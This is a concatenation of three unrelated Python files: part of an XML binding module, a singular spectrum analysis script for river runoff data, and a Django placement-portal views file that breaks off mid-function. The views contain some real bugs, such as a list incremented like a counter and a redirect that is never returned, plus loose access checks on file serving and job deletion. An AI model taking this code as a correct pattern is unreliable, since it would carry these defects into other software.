(namespace_, self.gds_format_string(quote_xml(self.StartDate).encode(ExternalEncoding), input_name='StartDate'), namespace_))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('<%sEndDate>%s</%sEndDate>\n' %
(namespace_, self.gds_format_string(quote_xml(self.EndDate).encode(ExternalEncoding), input_name='EndDate'), namespace_))
def hasContent_(self):
if (
self.StartDate is not None or
self.EndDate is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='EndingPeriodType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('StartDate=%s,\n' %
quote_python(self.StartDate).encode(ExternalEncoding))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('EndDate=%s,\n' %
quote_python(self.EndDate).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'StartDate':
StartDate_ = child_.text
StartDate_ = self.gds_validate_string(
StartDate_, node, 'StartDate')
self.StartDate = StartDate_
elif nodeName_ == 'EndDate':
EndDate_ = child_.text
EndDate_ = self.gds_validate_string(EndDate_, node, 'EndDate')
self.EndDate = EndDate_
# end class EndingPeriodType
class ExtensionPlaceHolder(GeneratedsSuper):
"""The sole purpose of this element is to provide a place to initialize
the usage of xjc extensions in."""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if ExtensionPlaceHolder.subclass:
return ExtensionPlaceHolder.subclass(*args_, **kwargs_)
else:
return ExtensionPlaceHolder(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='ExtensionPlaceHolder', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='ExtensionPlaceHolder')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ExtensionPlaceHolder'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='ExtensionPlaceHolder', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='ExtensionPlaceHolder'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class ExtensionPlaceHolder
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ServiceRequestType'
rootClass = ServiceRequestType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_=rootTag,
namespacedef_='')
return rootObj
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ServiceRequestType'
rootClass = ServiceRequestType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(sys.stdout, 0, name_="ServiceRequestType",
namespacedef_='')
return rootObj
def parseLiteral(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'ServiceRequestType'
rootClass = ServiceRequestType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
sys.stdout.write('#from SSDNRequest import *\n\n')
sys.stdout.write('import SSDNRequest as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"AuthorCodeList",
"AuthorizedUserType",
"ClosedPeriodType",
"DescriptionType",
"DetailMessageType",
"Diagnostic",
"EndDate",
"EndingPeriodType",
"ExtensionPlaceHolder",
"FieldName",
"FieldValue",
"InformationType",
"InscriptionType",
"PeriodType",
"ReasonCode",
"RequestContextType",
"RequestMessageType",
"ResultSummary",
"ReturnCode",
"SSDNRequest",
"ServiceRequestType",
"StartDate",
"StartingPeriodType",
"Version"
]
|
#%%
import numpy as np
from numpy import pi
import pandas as pd
import matplotlib.pyplot as plt
import os
root_path = os.path.dirname(os.path.abspath('__file__'))
import sys
sys.path.append(root_path+'/config/')
from variables import train_len, dev_len,test_len
from ssa import SSA
station = 'Huaxian' # 'Huaxian', 'Xianyang' and 'Zhangjiashan'
save_path = {
'Huaxian':root_path + '\\Huaxian_ssa\\data\\',
'Xianyang':root_path + '\\Xianyang_ssa\\data\\',
'Zhangjiashan':root_path + '\\Zhangjiashan_ssa\\data\\',
}
data ={
'Huaxian':(pd.read_excel(root_path+'/time_series/HuaxianRunoff1951-2018(1953-2018).xlsx')['MonthlyRunoff'][24:]).reset_index(drop=True),
'Xianyang':(pd.read_excel(root_path+'/time_series/XianyangRunoff1951-2018(1953-2018).xlsx')['MonthlyRunoff'][24:]).reset_index(drop=True),
'Zhangjiashan':(pd.read_excel(root_path+'/time_series/ZhangJiaShanRunoff1953-2018(1953-2018).xlsx')['MonthlyRunoff'][0:]).reset_index(drop=True),
}
if not os.path.exists(save_path[station]+'ssa-test\\'):
os.makedirs(save_path[station]+'ssa-test\\')
# plotting the monthly runoff of huaxian station
data[station].plot()
plt.title("Monthly Runoff of "+station+" station")
plt.xlabel("Time(1953/01-2008/12)")
plt.ylabel(r"Runoff($m^3/s$)")
plt.tight_layout()
plt.show()
full = data[station] #(full)from 1953/01 to 2018/12 792 samples
train = full[:train_len] #(train)from 1953/01 to 1998/12, 552 samples
train_dev = full[:train_len+dev_len]
# decomposition parameter
window = 12
columns=[
'ORIG',#orig_TS
'Trend',#F0
'Periodic1',#F1
'Periodic2',#F2
'Periodic3',#F3
'Periodic4',#F4
'Periodic5',#F5
'Periodic6',#F6
'Periodic7',#F7
'Periodic8',#F8
'Periodic9',#F9
'Periodic10',#F10
'Noise',#F11
]
#%%
# Decompose the entire monthly runoff of huaxian
huaxian_ssa = SSA(full,window)
F0 = huaxian_ssa.reconstruct(0)
F1 = huaxian_ssa.reconstruct(1)
F2 = huaxian_ssa.reconstruct(2)
F3 = huaxian_ssa.reconstruct(3)
F4 = huaxian_ssa.reconstruct(4)
F5 = huaxian_ssa.reconstruct(5)
F6 = huaxian_ssa.reconstruct(6)
F7 = huaxian_ssa.reconstruct(7)
F8 = huaxian_ssa.reconstruct(8)
F9 = huaxian_ssa.reconstruct(9)
F10 = huaxian_ssa.reconstruct(10)
F11 = huaxian_ssa.reconstruct(11)
orig_TS = huaxian_ssa.orig_TS
df = pd.concat([orig_TS,F0,F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11],axis=1)
df = pd.DataFrame(df.values,columns=columns)
df.to_csv(save_path[station]+'SSA_FULL.csv',index=None)
#%%
# Decompose the training monthly runoff of huaxian
huaxian_ssa = SSA(train,window)
F0 = huaxian_ssa.reconstruct(0)
F1 = huaxian_ssa.reconstruct(1)
F2 = huaxian_ssa.reconstruct(2)
F3 = huaxian_ssa.reconstruct(3)
F4 = huaxian_ssa.reconstruct(4)
F5 = huaxian_ssa.reconstruct(5)
F6 = huaxian_ssa.reconstruct(6)
F7 = huaxian_ssa.reconstruct(7)
F8 = huaxian_ssa.reconstruct(8)
F9 = huaxian_ssa.reconstruct(9)
F10 = huaxian_ssa.reconstruct(10)
F11 = huaxian_ssa.reconstruct(11)
orig_TS = huaxian_ssa.orig_TS
df = pd.concat([orig_TS,F0,F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11],axis=1)
df = pd.DataFrame(df.values,columns=columns)
df.to_csv(save_path[station]+'SSA_TRAIN.csv',index=None)
#%%
# Decompose the training-development monthly runoff of huaxian
huaxian_ssa = SSA(train_dev,window)
F0 = huaxian_ssa.reconstruct(0)
F1 = huaxian_ssa.reconstruct(1)
F2 = huaxian_ssa.reconstruct(2)
F3 = huaxian_ssa.reconstruct(3)
F4 = huaxian_ssa.reconstruct(4)
F5 = huaxian_ssa.reconstruct(5)
F6 = huaxian_ssa.reconstruct(6)
F7 = huaxian_ssa.reconstruct(7)
F8 = huaxian_ssa.reconstruct(8)
F9 = huaxian_ssa.reconstruct(9)
F10 = huaxian_ssa.reconstruct(10)
F11 = huaxian_ssa.reconstruct(11)
orig_TS = huaxian_ssa.orig_TS
df = pd.concat([orig_TS,F0,F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11,],axis=1)
df = pd.DataFrame(df.values,columns=columns)
df.to_csv(save_path[station]+'SSA_TRAINDEV.csv',index=None)
#%%
for i in range(1,241):
data = full[0:train_len+i]
huaxian_ssa = SSA(data,window)
F0 = huaxian_ssa.reconstruct(0)
F1 = huaxian_ssa.reconstruct(1)
F2 = huaxian_ssa.reconstruct(2)
F3 = huaxian_ssa.reconstruct(3)
F4 = huaxian_ssa.reconstruct(4)
F5 = huaxian_ssa.reconstruct(5)
F6 = huaxian_ssa.reconstruct(6)
F7 = huaxian_ssa.reconstruct(7)
F8 = huaxian_ssa.reconstruct(8)
F9 = huaxian_ssa.reconstruct(9)
F10 = huaxian_ssa.reconstruct(10)
F11 = huaxian_ssa.reconstruct(11)
orig_TS = huaxian_ssa.orig_TS
df = pd.concat([orig_TS,F0,F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11,],axis=1)
df = pd.DataFrame(df.values,columns=columns)
df.to_csv(save_path[station]+'ssa-test/ssa_appended_test'+str(train_len+i)+'.csv',index=None)
|
<gh_stars>1-10
# //=======================================================================
# // Copyright JobPort, IIIT Delhi 2015.
# // Distributed under the MIT License.
# // (See accompanying file LICENSE or copy at
# // http://opensource.org/licenses/MIT)
# //=======================================================================
# __author__ = 'naman'
import StringIO
import csv
import os
import zipfile
from multiprocessing import Process
from django.contrib import messages
from django.contrib.auth import logout as auth_logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render
from django.utils import timezone
from jobport import forms
from jobport.helpers import is_admin, is_member, is_eligible, checkdeadline
from jobport.models import Job, Student, Batch
from placement import settings
def _send_mail(subject, text_content, host_user, recipient_list):
"""Sending mail to the recipient_list. Written by http://darkryder.me/."""
msg = EmailMultiAlternatives(
subject, text_content, host_user, recipient_list)
a = msg.send()
print "Mail sent"
def send_mail(subject, text_content, recipient_list):
"""Start the process for sending mails. Written by http://darkryder.me/."""
p = Process(target=_send_mail, args=(subject, text_content,
settings.EMAIL_HOST_USER, recipient_list))
p.start()
def server_error(request):
"""Error page for 500."""
response = render(request, "jobport/500.html")
response.status_code = 500
return response
def not_found(request):
"""Error page for 404."""
response = render(request, "jobport/404.html")
response.status_code = 404
return response
# def test(request):
# return render(request, 'jobport/material.min.js.map')
def home(request):
"""Landing home page after login of student or admin."""
if request.user.is_authenticated():
context = {'user': request.user,
'jobs': Job.objects.all().order_by('-deadline')}
if is_member(request.user, 'admin'):
return render(request, 'jobport/admin_home.html', context)
else:
studentgroup = Group.objects.get(name='student')
if (not is_member(request.user, studentgroup)):
return HttpResponseRedirect('/newuser')
return render(request, 'jobport/home_student.html', context)
return render(request, 'jobport/welcome.html')
@login_required()
def jobapply(request, jobid):
"""Apply for a job, if deadline permits."""
if (timezone.now() < Job.objects.get(pk=jobid).deadline):
if (is_eligible(request.user.student, Job.objects.get(pk=jobid))['value']):
request.user.student.companyapplications.add(
Job.objects.get(pk=jobid))
messages.success(request, 'Thanks for applying!')
return HttpResponseRedirect('/')
else:
return render(request, 'jobport/badboy.html')
else:
return render(request, 'jobport/latedeadline.html')
@login_required()
def jobwithdraw(request, jobid):
"""Withdraw from the job, if deadline permits."""
if (timezone.now() < Job.objects.get(pk=jobid).deadline):
request.user.student.companyapplications.remove(
Job.objects.get(pk=jobid))
messages.success(request, 'You have withdrawn!')
return HttpResponseRedirect('/')
else:
return render(request, 'jobport/latedeadline.html')
@login_required()
def myapplications(request):
"""Enumerate student's applications for a job."""
studentgroup = Group.objects.get(name='student')
if (not is_member(request.user, studentgroup)):
return HttpResponseRedirect('/newuser')
context = {'user': request.user,
'jobs': request.user.student.companyapplications.all()}
return render(request, 'jobport/applications_student.html', context)
@login_required()
def jobpage(request, jobid):
"""Loads the page for a particular Job."""
if is_admin(request.user):
context = {'user': request.user, 'job': Job.objects.get(pk=jobid)}
return render(request, 'jobport/admin_job.html', context)
else:
hasapplied = request.user.student.companyapplications.filter(
pk__contains=jobid).count()
iseligible = is_eligible(request.user.student,
Job.objects.get(pk=jobid))
deadlinepassed = checkdeadline(Job.objects.get(pk=jobid))
context = {'user': request.user, 'job': Job.objects.get(pk=jobid), 'deadlinepassed': deadlinepassed,
'hasapplied': hasapplied, 'iseligible': iseligible['value'],
'iseligiblereasons': iseligible['reasons']}
return render(request, 'jobport/job_student.html', context)
@login_required()
def admineditstudent(request, studentid):
"""Allows admin to change the student details."""
if is_admin(request.user):
if request.method == 'POST':
form = forms.AdminStudentForm(
request.POST, request.FILES, instance=Student.objects.get(pk=studentid))
if form.is_valid():
usr = form.save(commit=False)
if (request.FILES.__len__() == 0):
usr.resume = Student.objects.get(pk=studentid).resume
else:
my_student = Student.objects.get(pk=studentid)
usr.resume.name = my_student.batch.title + '_' + \
my_student.user.username.split('@')[0] + ".pdf"
if "@iiitd.ac.in" in request.user.username:
usr.email = Student.objects.get(
pk=studentid).user.username
else:
usr.email = Student.objects.get(
pk=studentid).user.username + "@iiitd.ac.in"
usr.save()
form.save_m2m()
messages.success(request, 'Your form was saved')
return HttpResponseRedirect('/batches')
else:
messages.error(request, 'Error in form!')
context = {'form': form}
return render(request, 'jobport/admin_editstudent.html', context)
elif request.method == 'GET':
studentform = forms.AdminStudentForm(
instance=Student.objects.get(pk=studentid))
context = {'user': request.user,
'form': studentform, 'layout': 'horizontal'}
return render(request, 'jobport/admin_editstudent.html', context)
return HttpResponseRedirect('/')
else:
return render(request, 'jobport/badboy.html')
@login_required()
def getresumes(request, jobid):
"""Return resumes for students according to the incoming request."""
if is_admin(request.user):
filenames = []
if (request.GET.get('req') == 'selected'):
checklist = Job.objects.get(pk=jobid).selectedcandidates.all()
zip_subdir = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
pk=jobid).profile + "_Selected_Resumes"
else:
checklist = Job.objects.get(
pk=jobid).applicants.all() # AllApplicants
zip_subdir = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
pk=jobid).profile + "_Applicant_Resumes"
for student in checklist:
if (request.GET.get('qual') == 'G' and student.batch.pg_or_not == 'G'):
continue
if (request.GET.get('qual') == 'P' and student.batch.pg_or_not == 'P'):
continue
filenames.append(student.resume.path)
zip_filename = "%s.zip" % zip_subdir
s = StringIO.StringIO()
zf = zipfile.ZipFile(s, "w")
for fpath in filenames:
fdir, fname = os.path.split(fpath)
zip_path = os.path.join(zip_subdir, fname)
zf.write(fpath, zip_path)
zf.close()
resp = HttpResponse(
s.getvalue(), mimetype="application/x-zip-compressed")
resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename
return resp
else:
return render(request, 'jobport/badboy.html')
@login_required()
def profile(request):
"""Allows editing student profile by themselves."""
studentgroup = Group.objects.get(name='student')
if (not is_member(request.user, studentgroup)):
return HttpResponseRedirect('/newuser')
if request.method == 'POST':
form = forms.StudentForm(
request.POST, request.FILES, instance=request.user.student)
if form.is_valid():
usr = form.save(commit=False)
usr.user = request.user
if "@<EMAIL>.ac.in" in request.user.username:
usr.email = request.user.username
else:
usr.email = usr.email = request.user.username + "@<EMAIL>.ac.in"
if (request.FILES.__len__() == 0):
usr.resume = request.user.student.resume
else:
usr.resume.name = usr.batch.title + '_' + \
request.user.username.split('@')[0] + ".pdf"
usr.save()
messages.success(request, 'Your details were saved.')
return HttpResponseRedirect('/')
else:
context = {'form': form, 'student': request.user.student}
return render(request, 'jobport/student_profile.html', context)
elif request.method == 'GET':
studentform = forms.StudentForm(instance=request.user.student)
context = {'user': request.user, 'form': studentform, 'layout': 'horizontal',
'student': request.user.student}
return render(request, 'jobport/student_profile.html', context)
def newuser(request):
"""New User Sign Up form."""
studentgroup, created = Group.objects.get_or_create(
name='student') # Creating user group
if request.user.is_authenticated():
if is_member(request.user, studentgroup):
HttpResponseRedirect('/')
if request.method == 'POST':
form = forms.NewStudentForm(request.POST, request.FILES)
# print form.cleaned_data
if form.is_valid():
usr = form.save(commit=False)
usr.user = request.user
usr.email = request.user.username + "@iiitd.ac.in"
usr.name = request.user.first_name + " " + request.user.last_name
usr.resume.name = request.user.username.split('@')[0] + ".pdf"
usr.save()
studentgroup.user_set.add(request.user)
usr.batch = form.cleaned_data['batch']
messages.success(
request, 'Your details were saved. Welcome to JobPort.')
return HttpResponseRedirect('/')
else:
context = {'form': form, 'resumer_url': settings.RESUME_URL}
return render(request, 'jobport/newstudent.html', context)
elif request.method == 'GET':
studentform = forms.NewStudentForm()
context = {'user': request.user, 'form': studentform, 'layout': 'horizontal',
'resumer_url': settings.RESUME_URL}
return render(request, 'jobport/newstudent.html', context)
return HttpResponseRedirect('/')
def logout(request):
"""Logs out user"""
auth_logout(request)
return HttpResponseRedirect('/')
def needlogin(request):
"""need login"""
return render(request, 'jobport/needlogin.html')
@login_required()
def openjob(request):
"""Open a new Job from admin side."""
if is_admin(request.user):
if request.method == 'POST':
form = forms.JobForm(request.POST)
if form.is_valid():
tosavejob = form.save(commit=False)
tosavejob.createdon = timezone.now()
tosavejob.save()
for x in form.cleaned_data['batch']:
tosavejob.batch.add(x)
tosavejob.save()
recipients = []
for student in Student.objects.all():
if student.status == 'D' or student.status == 'NI':
continue
recipients.append(student.email)
settings.EMAIL_HOST_USER += '<EMAIL>'
send_mail(
'New Job in JobPort!',
'Hey!\n\nA new job for ' + tosavejob.profile + ', ' + tosavejob.company_name +
' was added on JobPort. \n Please login at jobport.iiitd.edu.in:8081',
recipients
)
settings.EMAIL_HOST_USER += ''
return HttpResponseRedirect('/')
else:
context = {'form': form}
return render(request, 'jobport/openjob.html', context)
else:
form = forms.JobForm()
c = {'form': form}
return render(request, 'jobport/openjob.html', c)
else:
return render(request, 'jobport/notallowed.html')
@login_required()
def jobdelete(request, jobid):
"""Delete a Job from admin side."""
if is_admin(request.user):
Job.objects.get(pk=jobid).delete()
return HttpResponseRedirect('/')
@login_required()
def jobedit(request, jobid):
"""Edit Job details from admin side."""
if is_admin(request.user):
if request.method == 'POST':
form = forms.JobForm(request.POST, request.FILES,
instance=Job.objects.get(pk=jobid))
if form.is_valid():
form.save() # This does the trick!
messages.success(request, 'Job was saved')
return HttpResponseRedirect('/job/' + str(jobid) + '/')
else:
context = {'form': form}
return render(request, 'jobport/admin_editjob.html', context)
else:
form = forms.JobForm(instance=Job.objects.get(pk=jobid))
c = {'form': form}
return render(request, 'jobport/admin_editjob.html', c)
@login_required()
def jobapplicants(request, jobid):
"""See the applicants for a particular Job."""
if is_admin(request.user):
count = 0
for student in Student.objects.all():
if is_eligible(student, Job.objects.get(pk=jobid))['value']:
count = count + 1
context = {'eligiblestudentcount': count, 'applicants': Job.objects.get(pk=jobid).applicants.all(),
'job': Job.objects.get(pk=jobid)}
return render(request, 'jobport/admin_jobapplicants.html', context)
@login_required()
def sendselectedemail(request, jobid):
"""Send mail to selected students for a particular Job."""
if is_admin(request.user):
candemail = []
thejob = Job.objects.get(pk=jobid)
for candidate in thejob.selectedcandidates.all():
candidate.status = 'P'
candidate.save()
candemail = candemail + [str(candidate.email)]
settings.EMAIL_HOST_USER += '<EMAIL>'
send_mail(
'Congratulations! You\'ve been placed! :D',
"Hey!\n\nCongratulations! You have been placed as " +
thejob.profile + ' at ' + thejob.company_name + "!!",
candemail
)
settings.EMAIL_HOST_USER += ''
messages.success(request, 'Mails Sent!')
return HttpResponseRedirect('/')
@login_required()
def adminjobselected(request, jobid):
"""Select the final students fot the Job :D"""
if is_admin(request.user):
if request.method == 'POST':
form = forms.AdminSelectedApplicantsForm(
request.POST, instance=Job.objects.get(pk=jobid))
if form.is_valid():
tosavejob = form.save(commit=False)
tosavejob.save()
form.save()
form.save_m2m()
for candidate in Job.objects.get(pk=jobid).selectedcandidates.all():
candidate.status = 'P'
candidate.save()
return HttpResponseRedirect('/')
else:
context = {'form': form}
return render(request, 'jobport/admin_jobselections.html', context)
else:
form = forms.AdminSelectedApplicantsForm(
instance=Job.objects.get(pk=jobid))
context = {'selected': Job.objects.get(pk=jobid).selectedcandidates.all(), 'form': form,
'job': Job.objects.get(pk=jobid)}
return render(request, 'jobport/admin_jobselections.html', context)
@login_required()
def uploadcgpa(request):
"""Upload the CGPA CSV for all the students, to update student CGPAs."""
if is_admin(request.user):
if request.method == 'POST':
if (not request.FILES.get('cgpafile', None)) or not request.FILES['cgpafile'].size:
messages.error(request, 'File Not Found!')
return render(request, 'jobport/admin_uploadcgpa.html')
upload_file = request.FILES['cgpafile']
notfound = []
for row in csv.reader(upload_file.read().splitlines()):
try:
stud = Student.objects.get(pk=row[0])
if (row[0][:2].upper() == 'MT'):
stud.cgpa_pg = float(row[1])
else:
stud.cgpa_ug = float(row[1])
stud.save()
except ObjectDoesNotExist:
notfound.append(row[0])
context = {'notfound': notfound}
messages.success(request, 'CGPA was succesfully uploaded')
return render(request, 'jobport/admin_uploadcgpa.html', context)
else:
return render(request, 'jobport/admin_uploadcgpa.html')
else:
return render(request, 'jobport/notallowed.html') # 403 Error
@login_required()
def stats(request):
"""Calculating statistics for the statistics page."""
if is_admin(request.user):
numstudentsplaced = 0
cgpahistdata = []
uninterested_students = []
Students = Student.objects.all()
Jobs = Job.objects.all()
for student in Students:
if student.status == 'P':
numstudentsplaced += 1
if student.status == 'NI' or student.status == 'D':
uninterested_students += 1
# CGPA Hist
if student.batch.pg_or_not == 'G':
if student.cgpa_ug != None and student.cgpa_ug != 0:
cgpahistdata.append([student.rollno, student.cgpa_ug])
else:
if student.cgpa_pg != None and student.cgpa_pg != 0:
cgpahistdata.append([student.rollno, student.cgpa_pg])
jobcgpahistdata = []
for job in Jobs:
if job.cgpa_min != None:
jobcgpahistdata.append(
[(job.company_name + ", " + job.profile), job.cgpa_min])
interested_students = len(Students) - len(uninterested_students)
placedunplaceddata = [["Placed Students", numstudentsplaced],
["Unplaced Students", interested_students - numstudentsplaced]]
context = {'cgpahistdata': cgpahistdata, 'jobcgpahistdata': jobcgpahistdata,
'placedunplaceddata': placedunplaceddata, 'numstudents': interested_students,
'numstudentsplaced': numstudentsplaced, 'numjobs': len(Jobs)}
return render(request, 'jobport/admin_stats.html', context)
@login_required()
def blockedUnplacedlist(request):
"""Retrieves the list for Unplaced or Blocked/Debarred students."""
if is_admin(request.user):
response = HttpResponse(content_type='text/csv')
if (request.GET.get('req') == 'debarred'):
students = Student.objects.filter(status='D')
response[
'Content-Disposition'] = str('attachment; filename="' + 'BlockedStudents_list.csv"')
elif (request.GET.get('req') == 'unplaced'):
students = Student.objects.filter(status='N')
response[
'Content-Disposition'] = str('attachment; filename="' + 'UnplacedStudents_list.csv"')
elif (request.GET.get('req') == 'placed'):
students = Student.objects.filter(status='P')
response[
'Content-Disposition'] = str('attachment; filename="' + 'PlacedStudents_list.csv"')
elif (request.GET.get('req') == 'notInterested'):
students = Student.objects.filter(status='NI')
response[
'Content-Disposition'] = str('attachment; filename="' + 'NotInterested_list.csv"')
elif (request.GET.get('req') == 'all'):
students = Student.objects.all()
response[
'Content-Disposition'] = str('attachment; filename="' + 'All_list.csv"')
writer = csv.writer(response)
writer.writerow(
["RollNo", "Name", "Email", "Gender", "Batch", "UnderGrad CGPA", "PostGrad CGPA{for PG}",
"Graduating University",
"PostGraduating University", "10th Marks", "12th Marks", "Backlogs", "Contact No."])
for student in students:
writer.writerow(
[student.rollno, student.name, student.email, student.get_gender_display(), student.batch,
student.cgpa_ug,
student.cgpa_pg, student.university_ug, student.university_pg, student.percentage_tenth,
student.percentage_twelfth, student.get_backlogs_display(), student.phone])
return response
else:
return render(request, 'jobport/badboy.html')
@login_required()
def getjobcsv(request, jobid):
"""Gets different (Eligible, Applied, Selected) CSVs for a particular Jobs."""
if is_admin(request.user):
response = HttpResponse(content_type='text/csv')
if (request.GET.get('req') == 'selected'):
studlist = Job.objects.get(pk=jobid).selectedcandidates.all()
name = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
pk=jobid).profile + "_Selected.csv"
elif (request.GET.get('req') == 'applied'):
studlist = Job.objects.get(pk=jobid).applicants.all()
name = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
pk=jobid).profile + "_Applicants.csv"
elif (request.GET.get('req') == 'eligible'):
studlist = []
for student in Student.objects.all():
if is_eligible(student, Job.objects.get(pk=jobid))['value']:
studlist.append(student)
name = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
pk=jobid).profile + "_Eligible.csv"
response[
'Content-Disposition'] = str('attachment; filename="' + name + '"')
writer = csv.writer(response)
writer.writerow([Job.objects.get(pk=jobid).company_name,
Job.objects.get(pk=jobid).profile])
writer.writerow(
["RollNo", "Name", "Email", "Gender", "CGPA", "Batch", "Graduating University", "10th Marks",
"12th Marks", "Backlogs", "Conact No.", "UnderGrad CGPA{PG}"]
)
for student in studlist:
if (student.batch.pg_or_not == 'G' and request.GET.get('qualification') != 'pg'):
writer.writerow(
[student.rollno, student.name, student.email, student.get_gender_display(), student.cgpa_ug,
student.batch,
student.university_ug, student.percentage_tenth, student.percentage_twelfth,
student.get_backlogs_display(), student.phone]
)
if (student.batch.pg_or_not == 'P' and request.GET.get('qualification') != 'ug'):
writer.writerow(
[student.rollno, student.name, student.email, student.get_gender_display(), student.cgpa_pg,
student.batch, student.university_pg, student.percentage_tenth, student.percentage_twelfth,
student.get_backlogs_display(), student.phone, student.cgpa_ug]
)
return response
else:
return render(request, 'jobport/badboy.html')
@login_required()
def getbatchlist(request, batchid):
"""Retrieves the list for students in a Batch."""
if is_admin(request.user):
response = HttpResponse(content_type='text/csv')
studlist = Batch.objects.get(pk=batchid).studentsinbatch.all()
name = Batch.objects.get(pk=batchid).title
response[
'Content-Disposition'] = str('attachment; filename="' + name + '_list.csv"')
writer = csv.writer(response)
writer.writerow(
["RollNo", "Name", "Email", "Gender", "UnderGrad CGPA", "PostGrad CGPA", "Graduating University",
"PostGraduating University", "10th Marks", "12th Marks", "Backlogs", "Contact No."])
for student in studlist:
writer.writerow(
[student.rollno, student.name, student.email, student.get_gender_display(), student.cgpa_ug,
student.cgpa_pg, student.university_ug, student.university_pg, student.percentage_tenth,
student.percentage_twelfth, student.get_backlogs_display(), student.phone])
return response
else:
return render(request, 'jobport/badboy.html')
def feedback(request):
"""FeedbackForm"""
if (request.method == 'POST'):
form = forms.FeedbackForm(request.POST)
# pdb.set_trace()
if form.is_valid():
form.save()
type = form.cleaned_data['type']
type = dict(form.fields['type'].choices)[type]
settings.EMAIL_HOST_USER += '<EMAIL>'
send_mail(
'[' + type + '] ' + form.cleaned_data['title'],
'A new feedback was posted on JobPort' + '\n\n' +
form.cleaned_data['body'], ['jobportiiitd<EMAIL>']
)
settings.EMAIL_HOST_USER += ''
messages.success(
request, 'Thanks for filling your precious feedback! :) ')
return HttpResponseRedirect('/')
else:
context = {'form': form}
return render(request, 'jobport/feedback.html', context)
else:
form = forms.FeedbackForm()
context = {'form': form}
return render(request, 'jobport/feedback.html', context)
@login_required()
def fileview(request, filename):
"""Protect the resume location, by adding headers, using nginx."""
response = HttpResponse()
response['Content-Type'] = 'application/pdf'
response['X-Accel-Redirect'] = "/protected/%s" % filename
return response
@login_required()
def docfileview(request, filename):
"""Protect the job file location, by adding headers, using nginx."""
response = HttpResponse()
response['Content-Type'] = 'application/pdf'
response['X-Accel-Redirect'] = "/jobfiles/%s" % filename
return response
@login_required()
def batchcreate(request):
"""Create a Batch."""
if is_admin(request.user):
if request.method == 'POST':
form = forms.BatchForm(request.POST)
if form.is_valid():
tosavebatch = form.save(commit=False)
tosavebatch.createdon = timezone.now()
tosavebatch.save()
else:
messages.error(
request, "There was error in the data, please try again!")
return HttpResponseRedirect(reverse('viewbatches'))
else:
form = forms.BatchForm()
c = {'form': form}
return render(request, 'jobport/openbatch.html', c)
else:
